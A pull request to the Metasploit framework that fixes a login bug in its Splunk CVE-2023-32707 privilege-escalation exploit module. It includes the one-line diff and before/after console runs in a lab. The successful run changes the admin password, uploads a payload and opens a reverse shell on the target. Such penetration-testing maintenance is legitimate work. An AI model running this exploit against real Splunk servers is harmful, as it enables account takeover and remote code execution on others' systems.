### PR TITLE
Fix bug in splunk CVE-2023-32707

### DIFF
--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def splunk_change_password(username, password)
     # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set
-    do_login(username, password) unless cookie
+    splunk_login(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
 
     print_status("Changing '#{username}' password to #{password}")
     res = send_request_cgi({


### PR DESCRIPTION
There is a logic flaw in the code for Splunk Privilege escalation CVE-2023-32707 module. The module tries to change the password of the admin user using the creds of a special user. Before trying to change the password, it checks if it is currently logged in([here](https://github.com/rapid7/metasploit-framework/blob/39b094313f9fb3d53b667691bd2f30aea99e42fa/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb#L249C1-L251C47)), if not it tries to login using `do_login(username, password)`. There are a few things wrong here, first off `do_login` should be `splunk_login` and the method should be called using `datastore['USERNAME']` and `datastore['PASSWORD']` since the parameters for `change_password` are the username of target(i.e admin) and the new password to set to.

Link to [setup](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md) vulnerable environment

## Before
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/splunk_privilege_escalation_cve_2023_32707`
- [x] `set` required options
- [x]  `set autocheck false`
- [x]  `run`
```
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit failed: NoMethodError undefined method `do_login' for #<Module:exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 datastore=[#<Msf::ModuleDataStoreWithFallbacks:0x00007f6bcb263ca0 @options={"WORKSPACE"=>#<Msf::OptString:0x00007f6beb4525c8 @name="WORKSPACE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @fallbacks=[], @required=false, @desc="Specify the workspace for this module", @default=nil, @enums=[], @owner=Msf::Module>, "VERBOSE"=>#<Msf::OptBool:0x00007f6beb451628 @name="VERBOSE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @fallbacks=[], @required=false, @desc="Enable detailed status messages", @default=false, @enums=[], @owner=Msf::Module>, "WfsDelay"=>#<Msf::OptInt:0x00007f6be8165b38 @name="WfsDelay", @advanced=true
...
snipped output
```

## After

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/splunk_privilege_escalation_cve_2023_32707`
- [x] `set` required options
- [x]  `set autocheck false`
- [x]  `run`
```
msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Changing 'admin' password to ZsVFwjvLpuiq
[+] Password of the user 'admin' has been changed to ZsVFwjvLpuiq
[*] Uploading file zathin
[+] zathin successfully uploaded
[*] Session ID 2 (172.17.0.1:4444 -> 172.17.0.2:52516) processing AutoRunScript 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
[!] SESSION may not be compatible with this module:
[!]  * Unknown session platform
[*] Executing cd on #<Session:shell 172.17.0.2:52516 (172.17.0.2) "">...
[*] Response: 
[*] Command shell session 2 opened (172.17.0.1:4444 -> 172.17.0.2:52516) at 2024-01-17 22:56:16 +0530

id
uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible)

```